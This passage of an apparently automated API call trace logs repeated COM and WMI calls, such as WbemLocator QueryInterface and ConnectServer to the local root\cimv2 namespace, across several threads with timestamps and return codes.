Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x545f5a8 | out: ppvObject=0x545f5a8*=0x596dc8) returned 0x0 [0184.324] WbemLocator:IUnknown:Release (This=0x5cd2b8) returned 0x0 [0184.324] WbemLocator:IUnknown:QueryInterface (in: This=0x596dc8, riid=0x693ade2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x545f1cc | out: ppvObject=0x545f1cc*=0x596dc8) returned 0x0 [0184.324] WbemLocator:IUnknown:QueryInterface (in: This=0x596dc8, riid=0x69519c98*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x545f188 | out: ppvObject=0x545f188*=0x0) returned 0x80004002 [0184.325] WbemLocator:IUnknown:QueryInterface (in: This=0x596dc8, riid=0x69519c88*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x545ed7c | out: ppvObject=0x545ed7c*=0x0) returned 0x80004002 [0184.325] WbemLocator:IUnknown:AddRef (This=0x596dc8) returned 0x3 [0184.325] WbemLocator:IUnknown:QueryInterface (in: This=0x596dc8, riid=0x695198cc*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x545eadc | out: ppvObject=0x545eadc*=0x0) returned 0x80004002 [0184.325] WbemLocator:IUnknown:QueryInterface (in: This=0x596dc8, riid=0x69519820*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x545ea8c | out: ppvObject=0x545ea8c*=0x0) returned 0x80004002 [0184.325] WbemLocator:IUnknown:QueryInterface (in: This=0x596dc8, riid=0x693ba540*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x545ea98 | out: ppvObject=0x545ea98*=0x0) returned 0x80004002 [0184.325] CoGetContextToken (in: pToken=0x545eaf8 | out: pToken=0x545eaf8) returned 0x0 [0184.325] CoGetContextToken (in: pToken=0x545ef00 | out: pToken=0x545ef00) returned 0x0 [0184.325] WbemLocator:IUnknown:QueryInterface (in: This=0x596dc8, riid=0x69519b0c*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x545ef8c | out: ppvObject=0x545ef8c*=0x0) returned 0x80004002 [0184.325] WbemLocator:IUnknown:Release (This=0x596dc8) returned 0x2 [0184.325] WbemLocator:IUnknown:Release (This=0x596dc8) returned 0x1 [0184.325] CoGetContextToken (in: pToken=0x545f588 | out: pToken=0x545f588) returned 0x0 [0184.325] CoGetContextToken (in: pToken=0x545f4e8 | out: pToken=0x545f4e8) returned 0x0 [0184.325] WbemLocator:IUnknown:QueryInterface (in: This=0x596dc8, riid=0x545f5b8*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x545f5b4 | out: ppvObject=0x545f5b4*=0x596dc8) returned 0x0 [0184.325] WbemLocator:IUnknown:AddRef (This=0x596dc8) returned 0x3 [0184.325] WbemLocator:IUnknown:Release (This=0x596dc8) returned 0x2 [0184.326] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x594510, puCount=0x545f74c | out: puCount=0x545f74c*=0x2) returned 0x0 [0184.326] WbemDefPath:IWbemPath:GetText (in: This=0x594510, lFlags=8, puBuffLength=0x545f748*=0x0, pszText=0x0 | out: puBuffLength=0x545f748*=0xf, pszText=0x0) returned 0x0 [0184.326] WbemDefPath:IWbemPath:GetText (in: This=0x594510, lFlags=8, puBuffLength=0x545f748*=0xf, pszText="00000000000000" | out: puBuffLength=0x545f748*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0184.326] CoCreateInstance (in: rclsid=0x65a613b4*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x65a61414*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x545f624 | out: ppv=0x545f624*=0x596dd8) returned 0x0 [0184.326] WbemLocator:IWbemLocator:ConnectServer (in: This=0x596dd8, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x545f6b8 | out: ppNamespace=0x545f6b8*=0x57d4b0) returned 0x0 [0184.357] WbemLocator:IUnknown:QueryInterface (in: This=0x57d4b0, riid=0x65a61234*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x545f54c | out: ppvObject=0x545f54c*=0x5afb0c) returned 0x0 [0184.358] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x5afb0c, pProxy=0x57d4b0, pAuthnSvc=0x545f59c, pAuthzSvc=0x545f598, pServerPrincName=0x545f590, pAuthnLevel=0x545f594, pImpLevel=0x545f584, pAuthInfo=0x545f588, pCapabilites=0x545f58c | out: pAuthnSvc=0x545f59c*=0xa, pAuthzSvc=0x545f598*=0x0, pServerPrincName=0x545f590, pAuthnLevel=0x545f594*=0x6, pImpLevel=0x545f584*=0x2, pAuthInfo=0x545f588, pCapabilites=0x545f58c*=0x1) returned 0x0 [0184.358] WbemLocator:IUnknown:Release (This=0x5afb0c) returned 0x1 [0184.358] WbemLocator:IUnknown:QueryInterface (in: This=0x57d4b0, riid=0x65a61224*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x545f540 | out: ppvObject=0x545f540*=0x5afb30) returned 0x0 [0184.358] WbemLocator:IUnknown:QueryInterface (in: This=0x57d4b0, riid=0x65a61234*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x545f52c | out: ppvObject=0x545f52c*=0x5afb0c) returned 0x0 [0184.358] WbemLocator:IClientSecurity:SetBlanket (This=0x5afb0c, pProxy=0x57d4b0, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0184.358] WbemLocator:IUnknown:Release (This=0x5afb0c) returned 0x2 [0184.358] WbemLocator:IUnknown:Release (This=0x5afb30) returned 0x1 [0184.358] CoTaskMemFree (pv=0x598a08) [0184.358] WbemLocator:IUnknown:Release (This=0x596dd8) returned 0x0 [0184.358] WbemLocator:IUnknown:QueryInterface (in: This=0x57d4b0, riid=0x693ade2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x545f13c | out: ppvObject=0x545f13c*=0x5afb30) returned 0x0 [0184.358] WbemLocator:IUnknown:QueryInterface (in: This=0x5afb30, riid=0x69519c98*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x545f0f8 | out: ppvObject=0x545f0f8*=0x0) returned 0x80004002 [0184.367] WbemLocator:IUnknown:QueryInterface (in: This=0x5afb30, riid=0x69519bb4*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x545ef14 | out: ppvObject=0x545ef14*=0x0) returned 0x80004002 [0184.369] WbemLocator:IUnknown:QueryInterface (in: This=0x57d4b0, riid=0x69519c88*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x545ecec | out: ppvObject=0x545ecec*=0x0) returned 0x80004002 [0184.369] WbemLocator:IUnknown:AddRef (This=0x5afb30) returned 0x3 [0184.369] WbemLocator:IUnknown:QueryInterface (in: This=0x5afb30, riid=0x695198cc*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x545ea4c | out: ppvObject=0x545ea4c*=0x0) returned 0x80004002 [0184.369] WbemLocator:IUnknown:QueryInterface (in: This=0x5afb30, riid=0x69519820*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x545e9fc | out: ppvObject=0x545e9fc*=0x0) returned 0x80004002 [0184.369] WbemLocator:IUnknown:QueryInterface (in: This=0x5afb30, riid=0x693ba540*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x545ea08 | out: ppvObject=0x545ea08*=0x5afa8c) returned 0x0 [0184.370] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x5afa8c, riid=0x693ade2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x545ea10 | out: pCid=0x545ea10*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0184.370] WbemLocator:IUnknown:Release (This=0x5afa8c) returned 0x3 [0184.370] CoGetContextToken (in: pToken=0x545ea68 | out: pToken=0x545ea68) returned 0x0 [0184.370] CoGetContextToken (in: pToken=0x545ee70 | out: pToken=0x545ee70) returned 0x0 [0184.370] WbemLocator:IUnknown:QueryInterface (in: This=0x5afb30, riid=0x69519b0c*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x545eefc | out: ppvObject=0x545eefc*=0x5afb14) returned 0x0 [0184.370] WbemLocator:IRpcOptions:Query (in: This=0x5afb14, pPrx=0x5afb30, dwProperty=2, pdwValue=0x545ef08 | out: pdwValue=0x545ef08) returned 0x80004002 [0184.370] WbemLocator:IUnknown:Release (This=0x5afb14) returned 0x3 [0184.370] WbemLocator:IUnknown:Release (This=0x5afb30) returned 0x2 [0184.370] CoGetContextToken (in: pToken=0x545f450 | out: pToken=0x545f450) returned 0x0 [0184.370] CoGetContextToken (in: pToken=0x545f3b0 | out: pToken=0x545f3b0) returned 0x0 [0184.370] WbemLocator:IUnknown:QueryInterface (in: This=0x5afb30, riid=0x545f480*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x545f47c | out: ppvObject=0x545f47c*=0x57d4b0) returned 0x0 [0184.370] WbemLocator:IUnknown:AddRef (This=0x57d4b0) returned 0x4 [0184.370] WbemLocator:IUnknown:Release (This=0x57d4b0) returned 0x3 [0184.370] WbemLocator:IUnknown:Release (This=0x57d4b0) returned 0x2 [0184.370] SysStringLen (param_1=0x0) returned 0x0 [0184.370] CoUninitialize () Thread: id = 175 os_tid = 0xae8 [0184.539] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0184.539] RoInitialize () returned 0x1 [0184.540] RoUninitialize () returned 0x0 [0184.540] CoGetClassObject (in: rclsid=0x588014*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x694f4d80*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x541f300 | out: ppv=0x541f300*=0x5cccd0) returned 0x0 [0184.541] WbemLocator:IUnknown:QueryInterface (in: This=0x5cccd0, riid=0x694d79fc*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x541f51c | out: ppvObject=0x541f51c*=0x0) returned 0x80004002 [0184.541] WbemLocator:IClassFactory:CreateInstance (in: This=0x5cccd0, pUnkOuter=0x0, riid=0x693ade2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x541f528 | out: ppvObject=0x541f528*=0x596cf8) returned 0x0 [0184.541] WbemLocator:IUnknown:Release (This=0x5cccd0) returned 0x0 [0184.541] WbemLocator:IUnknown:QueryInterface (in: This=0x596cf8, riid=0x693ade2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x541f14c | out: ppvObject=0x541f14c*=0x596cf8) returned 0x0 [0184.541] WbemLocator:IUnknown:QueryInterface (in: This=0x596cf8, riid=0x69519c98*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x541f108 | out: ppvObject=0x541f108*=0x0) returned 0x80004002 [0184.541] WbemLocator:IUnknown:QueryInterface (in: This=0x596cf8, riid=0x69519c88*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x541ecfc | out: ppvObject=0x541ecfc*=0x0) returned 0x80004002 [0184.541] WbemLocator:IUnknown:AddRef (This=0x596cf8) returned 0x3 [0184.541] WbemLocator:IUnknown:QueryInterface (in: This=0x596cf8, riid=0x695198cc*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x541ea5c | out: ppvObject=0x541ea5c*=0x0) returned 0x80004002 [0184.541] WbemLocator:IUnknown:QueryInterface (in: This=0x596cf8, riid=0x69519820*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x541ea0c | out: ppvObject=0x541ea0c*=0x0) returned 0x80004002 [0184.541] WbemLocator:IUnknown:QueryInterface (in: This=0x596cf8, riid=0x693ba540*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x541ea18 | out: ppvObject=0x541ea18*=0x0) returned 0x80004002 [0184.541] CoGetContextToken (in: pToken=0x541ea78 | out: pToken=0x541ea78) returned 0x0 [0184.542] CoGetContextToken (in: pToken=0x541ee80 | out: pToken=0x541ee80) returned 0x0 [0184.542] WbemLocator:IUnknown:QueryInterface (in: This=0x596cf8, riid=0x69519b0c*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x541ef0c | out: ppvObject=0x541ef0c*=0x0) returned 0x80004002 [0184.542] WbemLocator:IUnknown:Release (This=0x596cf8) returned 0x2 [0184.542] WbemLocator:IUnknown:Release (This=0x596cf8) returned 0x1 [0184.542] CoGetContextToken (in: pToken=0x541f508 | out: pToken=0x541f508) returned 0x0 [0184.542] CoGetContextToken (in: pToken=0x541f468 | out: pToken=0x541f468) returned 0x0 [0184.542] WbemLocator:IUnknown:QueryInterface (in: This=0x596cf8, riid=0x541f538*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x541f534 | out: ppvObject=0x541f534*=0x596cf8) returned 0x0 [0184.542] WbemLocator:IUnknown:AddRef (This=0x596cf8) returned 0x3 [0184.542] WbemLocator:IUnknown:Release (This=0x596cf8) returned 0x2 [0184.542] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x594510, puCount=0x541f6cc | out: puCount=0x541f6cc*=0x2) returned 0x0 [0184.542] WbemDefPath:IWbemPath:GetText (in: This=0x594510, lFlags=8, puBuffLength=0x541f6c8*=0x0, pszText=0x0 | out: puBuffLength=0x541f6c8*=0xf, pszText=0x0) returned 0x0 [0184.542] WbemDefPath:IWbemPath:GetText (in: This=0x594510, lFlags=8, puBuffLength=0x541f6c8*=0xf, pszText="00000000000000" | out: puBuffLength=0x541f6c8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0184.542] CoCreateInstance (in: rclsid=0x65a613b4*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x65a61414*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x541f5a4 | out: ppv=0x541f5a4*=0x596d18) returned 0x0 [0184.542] WbemLocator:IWbemLocator:ConnectServer (in: This=0x596d18, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x541f638 | out: ppNamespace=0x541f638*=0x57d550) returned 0x0 [0184.560] WbemLocator:IUnknown:QueryInterface (in: This=0x57d550, riid=0x65a61234*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x541f4cc | out: ppvObject=0x541f4cc*=0x5afc0c) returned 0x0 [0184.560] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x5afc0c, pProxy=0x57d550, pAuthnSvc=0x541f51c, pAuthzSvc=0x541f518, pServerPrincName=0x541f510, pAuthnLevel=0x541f514, pImpLevel=0x541f504, pAuthInfo=0x541f508, pCapabilites=0x541f50c | out: pAuthnSvc=0x541f51c*=0xa, pAuthzSvc=0x541f518*=0x0, pServerPrincName=0x541f510, pAuthnLevel=0x541f514*=0x6, pImpLevel=0x541f504*=0x2, pAuthInfo=0x541f508, pCapabilites=0x541f50c*=0x1) returned 0x0 [0184.560] WbemLocator:IUnknown:Release (This=0x5afc0c) returned 0x1 [0184.560] WbemLocator:IUnknown:QueryInterface (in: This=0x57d550, riid=0x65a61224*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x541f4c0 | out: ppvObject=0x541f4c0*=0x5afc30) returned 0x0 [0184.560] WbemLocator:IUnknown:QueryInterface (in: This=0x57d550, riid=0x65a61234*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x541f4ac | out: ppvObject=0x541f4ac*=0x5afc0c) returned 0x0 [0184.560] WbemLocator:IClientSecurity:SetBlanket (This=0x5afc0c, pProxy=0x57d550, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0184.560] WbemLocator:IUnknown:Release (This=0x5afc0c) returned 0x2 [0184.560] WbemLocator:IUnknown:Release (This=0x5afc30) returned 0x1 [0184.561] CoTaskMemFree (pv=0x598df8) [0184.561] WbemLocator:IUnknown:Release (This=0x596d18) returned 0x0 [0184.561] WbemLocator:IUnknown:QueryInterface (in: This=0x57d550, riid=0x693ade2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x541f0bc | out: ppvObject=0x541f0bc*=0x5afc30) returned 0x0 [0184.561] WbemLocator:IUnknown:QueryInterface (in: This=0x5afc30, riid=0x69519c98*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x541f078 | out: ppvObject=0x541f078*=0x0) returned 0x80004002 [0184.561] WbemLocator:IUnknown:QueryInterface (in: This=0x5afc30, riid=0x69519bb4*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x541ee94 | out: ppvObject=0x541ee94*=0x0) returned 0x80004002 [0184.562] WbemLocator:IUnknown:QueryInterface (in: This=0x57d550, riid=0x69519c88*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x541ec6c | out: ppvObject=0x541ec6c*=0x0) returned 0x80004002 [0184.562] WbemLocator:IUnknown:AddRef (This=0x5afc30) returned 0x3 [0184.562] WbemLocator:IUnknown:QueryInterface (in: This=0x5afc30, riid=0x695198cc*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x541e9cc | out: ppvObject=0x541e9cc*=0x0) returned 0x80004002 [0184.562] WbemLocator:IUnknown:QueryInterface (in: This=0x5afc30, riid=0x69519820*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x541e97c | out: ppvObject=0x541e97c*=0x0) returned 0x80004002 [0184.562] WbemLocator:IUnknown:QueryInterface (in: This=0x5afc30, riid=0x693ba540*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x541e988 | out: ppvObject=0x541e988*=0x5afb8c) returned 0x0 [0184.562] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x5afb8c, riid=0x693ade2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x541e990 | out: pCid=0x541e990*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0184.562] WbemLocator:IUnknown:Release (This=0x5afb8c) returned 0x3 [0184.562] CoGetContextToken (in: pToken=0x541e9e8 | out: pToken=0x541e9e8) returned 0x0 [0184.562] CoGetContextToken (in: pToken=0x541edf0 | out: pToken=0x541edf0) returned 0x0 [0184.562] WbemLocator:IUnknown:QueryInterface (in: This=0x5afc30, riid=0x69519b0c*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x541ee7c | out: ppvObject=0x541ee7c*=0x5afc14) returned 0x0 [0184.563] WbemLocator:IRpcOptions:Query (in: This=0x5afc14, pPrx=0x5afc30, dwProperty=2, pdwValue=0x541ee88 | out: pdwValue=0x541ee88) returned 0x80004002 [0184.563] WbemLocator:IUnknown:Release (This=0x5afc14) returned 0x3 [0184.563] WbemLocator:IUnknown:Release (This=0x5afc30) returned 0x2 [0184.563] CoGetContextToken (in: pToken=0x541f3d0 | out: pToken=0x541f3d0) returned 0x0 [0184.563] CoGetContextToken (in: pToken=0x541f330 | out: pToken=0x541f330) returned 0x0 [0184.563] WbemLocator:IUnknown:QueryInterface (in: This=0x5afc30, riid=0x541f400*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x541f3fc | out: ppvObject=0x541f3fc*=0x57d550) returned 0x0 [0184.563] WbemLocator:IUnknown:AddRef (This=0x57d550) returned 0x4 [0184.563] WbemLocator:IUnknown:Release (This=0x57d550) returned 0x3 [0184.563] WbemLocator:IUnknown:Release (This=0x57d550) returned 0x2 [0184.563] SysStringLen (param_1=0x0) returned 0x0 [0184.563] CoUninitialize () Thread: id = 176 os_tid = 0x1cc [0186.402] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0186.402] RoInitialize () returned 0x1 [0186.402] RoUninitialize () returned 0x0 [0186.403] CoGetClassObject (in: rclsid=0x588014*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x694f4d80*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x541f280 | out: ppv=0x541f280*=0x5b1ac8) returned 0x0 [0186.404] WbemLocator:IUnknown:QueryInterface (in: This=0x5b1ac8, riid=0x694d79fc*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x541f49c | out: ppvObject=0x541f49c*=0x0) returned 0x80004002 [0186.404] WbemLocator:IClassFactory:CreateInstance (in: This=0x5b1ac8, pUnkOuter=0x0, riid=0x693ade2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x541f4a8 | out: ppvObject=0x541f4a8*=0x596ff8) returned 0x0 [0186.404] WbemLocator:IUnknown:Release (This=0x5b1ac8) returned 0x0 [0186.404] WbemLocator:IUnknown:QueryInterface (in: This=0x596ff8, 